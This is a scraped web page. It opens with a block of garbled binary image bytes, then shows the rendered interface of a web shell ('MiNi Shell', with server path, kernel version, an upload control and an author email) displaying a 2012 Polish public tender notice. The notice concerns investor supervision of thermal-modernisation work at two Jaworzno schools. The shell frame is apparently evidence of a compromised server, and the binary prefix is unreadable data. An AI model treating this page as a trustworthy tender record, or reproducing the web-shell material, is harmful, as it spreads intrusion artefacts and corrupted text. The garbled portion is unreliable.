JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120606/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120606/192014-N-2012.html

<p class="kh_header"><b>Jaworzno: Nadzór inwestorski nad robotami termomodernizacyjnymi w budynkach szkół.</b><br>
<b>Numer ogłoszenia: 192014 - 2012; data zamieszczenia: 06.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zespół Obsługi Placówek Oświatowo-Wychowawczych w Jaworznie , ul. Północna 9b, 43-606 Jaworzno, woj. śląskie, tel. 032 6181800, 6181815, faks 032 6181801.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzopow.jaworzno.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa samorządu terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nadzór inwestorski nad robotami termomodernizacyjnymi w budynkach szkół..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Nadzór inwestorski w zakresie robót budowlanych wykonywanych w ramach projektu pn. Termomodernizacja obiektów oświatowych Miasta Jaworzna                     w ramach Działania 5.3. Czyste powietrze i odnawialne źródła energii RPO WSL                    na lata 2007 - 2013., obejmujących:
	1.1.	termomodernizację Szkoły Podstawowej Nr 3 w Jaworznie przy                            		ul. Kasprzaka 6, polegającą na wykonaniu robót budowlanych obejmujących 		docieplenie ścian i stropów, wymianę stolarki okiennej i drzwiowej, izolację 		ścian fundamentowych, przebudowę kotłowni węglowej na kotłownię gazową 		oraz wymianę instalacji wewnętrznej centralnego ogrzewania wraz                     		z  rozruchem, zleconej na podstawie odrębnej umowy Nr 49/VII/12                        		z dnia 	31.05.2012r. firmie Budowlano Remontowo Handlowej EVEREST 		Spółka Jawna Wojciech Gryłko, Krzysztof Papuga z siedzibą  w Brzeszczach 		ul. Kościuszki 16,
	1.2	termomodernizację Szkoły Podstawowej Nr 22 w Jaworznie przy                            		ul. Kasprzaka 6, polegającą na wykonaniu robót budowlanych obejmujących 		docieplenie ścian i stropów, wymianę stolarki okiennej i drzwiowej,              		izolację ścian   fundamentowych,   drenaż opaskowy pomieszczeń kotłowni, 		przebudowę kotłowni węglowej na kotłownię gazową 	oraz wymianę instalacji 		wewnętrznej centralnego   ogrzewania   wraz  z  rozruchem,                        		zleconej na 	podstawie odrębnej umowy Nr 48/VII/12 z dnia 31.05.2012r. 		firmie   Budowlano  Remontowo  Handlowej  EVEREST  Spółka  Jawna 		Wojciech Gryłko, Krzysztof Papuga z siedzibą  w Brzeszczach                              		ul. Kościuszki 16.
2.	Zakres obowiązków inspektorów nadzoru inwestorskiego obejmuje                                  	w szczególności:	
	2.1.	pełnienie  funkcji  inspektora  nadzoru  inwestorskiego w specjalnościach 		konstrukcyjno  - budowlanej, instalacyjnej w zakresie instalacji i urządzeń 		cieplnych   i   gazowych,   instalacyjnej  w  zakresie  instalacji  i  urządzeń 		elektrycznych,  nad  realizacją  robót budowlanych, zgodnie z art. 25  i 26 		ustawy 7 lipca 1994r.  Prawo Budowlane,
2.2.	reprezentowanie    Zamawiającego    na   budowie   przez   sprawowanie 		kontroli zgodności  jej  realizacji  z  dokumentacją  projektową                         		i  pozwoleniem na 	budowę, przepisami oraz zasadami wiedzy technicznej,
2.3.	sprawdzanie  jakości  wykonywanych  robót   i   wbudowanych   wyrobów 		budowlanych  a  w  szczególności  zapobieganie zastosowania  wyrobów 		wadliwych i niedopuszczonych w budownictwie,
2.4.	sprawdzanie  i   odbiór   robót   ulegających   zakryciu   lub  zanikających, 		uczestniczenie  w  próbach  i odbiorach technicznych instalacji, urządzeń 		technicznych  oraz  przygotowanie   i   udział  w  czynnościach  odbiorów 		częściowych i odbioru końcowego oraz przekazywanie ich do użytkowania,
2.5.	potwierdzanie faktycznie wykonywanych robót oraz usunięcia wad,
2.6.	powiadamianie Zamawiającego  o organizowanych                   		i prowadzonych naradach technicznych dotyczących realizacji zadania,
2.7.	kontrolowanie szczegółowych rozliczeń z wykonawcą robót, zgodnie                   		z zapisami umowy,
2.8.	sprawdzenie dokumentacji projektowej, a w przypadku stwierdzenia wad  		albo konieczności wprowadzenia zmian wystąpienie do projektanta na piśmie 		o wprowadzenie koniecznych zmian,
2.9.	pełnienie funkcji koordynatora na budowie,
2.10.	sprawdzanie    posiadanych   przez    wykonawcę    robót   odpowiednich 		dokumentów,   uprawnień,   atestów,   wyników  badań,  itp., dotyczących 		wykonania robót oraz dostarczonych materiałów i urządzeń, 
2.11.	opiniowanie propozycji zmian technologii wykonania, zmian materiałowych 		oraz    zmian    wyposażenia,    proponowanych   przez   wykonawcę robót  		lub Zamawiającego,
2.12.	inspektor   nadzoru   nie   może   podejmować decyzji, które wymagałyby 		zwiększenia nakładów finansowych przewidzianych w umowie z wykonawcą 		robót;  jeżeli   takie   sytuacje  wystąpią,  zwiększenie  kosztów  musi  być 		zatwierdzone  przez  Zamawiającego, z zastrzeżeniem odstąpienia od tej 		zasady  w  przypadkach,  gdy  zaniechanie  wykonania  robót  innych  niż 		wymienione w umowie z wykonawcą mogłoby spowodować zagrożenie dla 		życia ludzi lub katastrofę budowlaną,
2.13.	obecność na terenie budowy na wezwanie Zamawiającego lub wykonawcy 		robót.
3.	Inspektor nadzoru inwestorskiego ma prawo:
	 3.1.	wydawać    kierownikowi   budowy   lub   kierownikowi   robót   polecenia, 		potwierdzone   wpisem   do    dziennika   budowy,   dotyczące   usunięcia 		nieprawidłowości    lub    zagrożeń,    wykonania    prób    i   badań,               		a także wymagających   odkrycia  	robót   lub   elementów   zakrytych,   		oraz 	przedstawienia   ekspertyz   związanych z prowadzonymi robotami 		budowlanymi   i   dopuszczenia  do stosowania w budownictwie wyrobów 		budowlanych oraz urządzeń technicznych,
	3.2.	żądać od kierownika budowy lub kierownika robót dokonania poprawek bądź 		ponownego  wykonania  wadliwie  wykonanych  robót,  a  także  wstrzymania 		dalszych  robót  budowlanych w przypadku, gdyby ich kontynuacja mogła 		wywołać zagrożenie bądź spowodować niedopuszczalną niezgodność                  		z projektem lub pozwoleniem na budowę,
	3.3.	w  razie  stwierdzenia realizacji przedmiotu umowy w sposób wadliwy lub 		sprzeczny z umową wystawić stosowne wnioski dla Zamawiającego, łącznie 		z wnioskiem o odstąpienie od umowy z winy wykonawcy robót ze skutkami 		przewidzianymi z tego tytułu.

4.	Roboty przewidziane do objęcia nadzorem inwestorskim wykonywane będą zgodnie 	z dokumentacją projektową, wykonaną przez wykonawcę robót na podstawie:
4.1.	programu funkcjonalno - użytkowego dotyczącego termomodernizacji Szkoły Podstawowej Nr 3 w Jaworznie, stanowiącego Załącznik Nr 1 do SIWZ,
4.2.	inwentaryzacji budowlanej Szkoły Podstawowej Nr 3, stanowiącej Załącznik Nr 2 do SIWZ,
4.3.	programu funkcjonalno - użytkowego dotyczącego termomodernizacji Szkoły Podstawowej Nr 22 w Jaworznie, stanowiącego Załącznik Nr 3 do SIWZ,
4.4.	inwentaryzacji budowlanej Szkoły Podstawowej Nr 22, stanowiącej Załącznik Nr 4 do SIWZ.
5. Termin realizacji: termin wykonania zamówienia ustala się na okres:
- rozpoczęcie realizacji w dniu zawarcia umowy,
- zakończenie realizacji   do dnia 05.11.2012 r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.52.00.00-9, 71.52.10.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 05.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1000,00PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek poprzez :
 1)	wykonanie w okresie  ostatnich 3 lat przed upływem terminu składania ofert,  a jeżeli okres działalności jest krótszy, w tym okresie,                      co najmniej dwóch usług o wartości minimum 10 000,00 zł brutto  każda, polegających na pełnieniu nadzoru inwestorskiego nad robotami budowlanymi w branży konstrukcyjno - budowlanej,  
  2)	wykonanie w okresie  ostatnich 3 lat przed upływem terminu składania ofert,  a jeżeli okres działalności jest krótszy, w tym okresie,                      co najmniej dwóch usług o wartości minimum 2 000,00 zł brutto  każda, polegających na pełnieniu nadzoru inwestorskiego nad robotami budowlanymi w branży elektrycznej,             
	3)       wykonanie w okresie  ostatnich 3 lat przed upływem terminu składania 	ofert,  a jeżeli okres działalności jest krótszy, w tym okresie,                      	co najmniej dwóch usług o wartości minimum 4 000,00 zł brutto  	każda, polegających na pełnieniu nadzoru inwestorskiego nad	robotami budowlanymi w branży instalacyjnej w zakresie  wykonania 	lub przebudowy lub remontu kotłowni gazowej,            	
 4)	 wykonanie w okresie  ostatnich 3 lat przed upływem terminu 	składania 	ofert,  a jeżeli okres działalności jest krótszy, w tym 	okresie,  co najmniej dwóch usług o wartości minimum 4 000,00 zł 	brutto  każda, polegających na pełnieniu nadzoru inwestorskiego nad 	robotami budowlanymi w branży instalacyjnej  w zakresie  wykonania 	lub przebudowy lub remontu instalacji 	centralnego ogrzewania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek jezeli bezie dysponować osobami uprawnionymi do wykonania zamówienia, w tym:
1)	osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej lub odpowiadające ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów  prawa,
2)	 osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności  instalacyjnej w zakresie instalacji                       i urządzeń cieplnych i gazowych , lub odpowiadające ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów  prawa,
3)	 osobą posiadającą uprawnienia budowlane uprawniające do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie  instalacji    i urządzeń elektrycznych oraz  świadectwo kwalifikacyjne uprawniające do zajmowania się eksploatacją urządzeń i instalacji  zużywających energię elektryczną, na stanowisku dozoru, lub odpowiadające ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów  prawa.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.  Wykonawcy z innych państw członkowskich UE mogą spełnić warunek dysponowania osobami zdolnymi do wykonania  zamówienia, składając oświadczenie  o  posiadaniu  równoważnych  do  w/w  uprawnień	uzyskanych w swoich krajach.    
2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale 	technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru  prawnego łączących go z nimi stosunków; w tym przypadku wykonawca zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
3. Dla wykazania przez Wykonawcę dysponowania wiedzą i doświadczeniem  podmiotu trzeciego, konieczne jest wskazanie przez Wykonawcę,
 w odrębnym oświadczeniu, sposobu udziału podmiotu trzeciego
 w wykonywaniu 	przedmiotu zamówienia  ( np. udział podmiotu trzeciego  jako podwykonawca).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zgodnie z postanowieniami art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość dokonania zmian w umowie zawartej                  z Wykonawcą, które mogą dotyczyć:
1.1. terminu wykonania zamówienia w przypadku:
1)	podpisania aneksu do umowy o dofinansowanie w ramach Regionalnego Programu Operacyjnego dla Województwa Śląskiego na lata 2007-2013 projektu pn. Termomodernizacja obiektów oświatowych Miasta Jaworzna, zmieniającego zasady i terminy jego realizacji,
2)	działania siły wyższej,
3)	wystąpienie różnego rodzaju klęsk żywiołowych, epidemii, operacji wojennych, strajku generalnego oraz złych warunków atmosferycznych uniemożliwiających wykonywanie robót,
4)	wystąpienie przeszkód i utrudnień formalnoprawnych, nie wynikających
z przyczyn leżących po stronie zamawiającego lub wykonawcy, 
5)	zmiany w obowiązujących przepisach, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego, 
6)	zmiany terminu zakończenia nadzorowanych robót,
1.2.  terminu płatności  w przypadku:	
		1)  nieprzewidzianego braku płynności finansowej u zamawiającego,
       2) podpisania aneksu do umowy o dofinansowanie w ramach Regionalnego 		      Programu Operacyjnego dla Województwa Śląskiego na lata 2007-2013             projektu pn. Termomodernizacja obiektów oświatowych Miasta Jaworzna,            zmieniającego zasady i terminy jego realizacji,
       3) zmiany terminu zakończenia nadzorowanych robót,
1.3.	 wynagrodzenia umownego, w przypadku urzędowej zmiany stawki podatku VAT.
1.4.	 inne zmiany w przypadku  zmiany osób sprawujących nadzór inwestorski.
2. Wszystkie powyższe postanowienia stanowią katalog zmian, na które zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzopow.jaworzno.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 43-606 Jaworzno, ul. Północna 9B.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.06.2012 godzina 09:00, miejsce: siedziba zamawiającego: 43-606 Jaworzno, ul. Północna 9B, III piętro, pok. 308.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com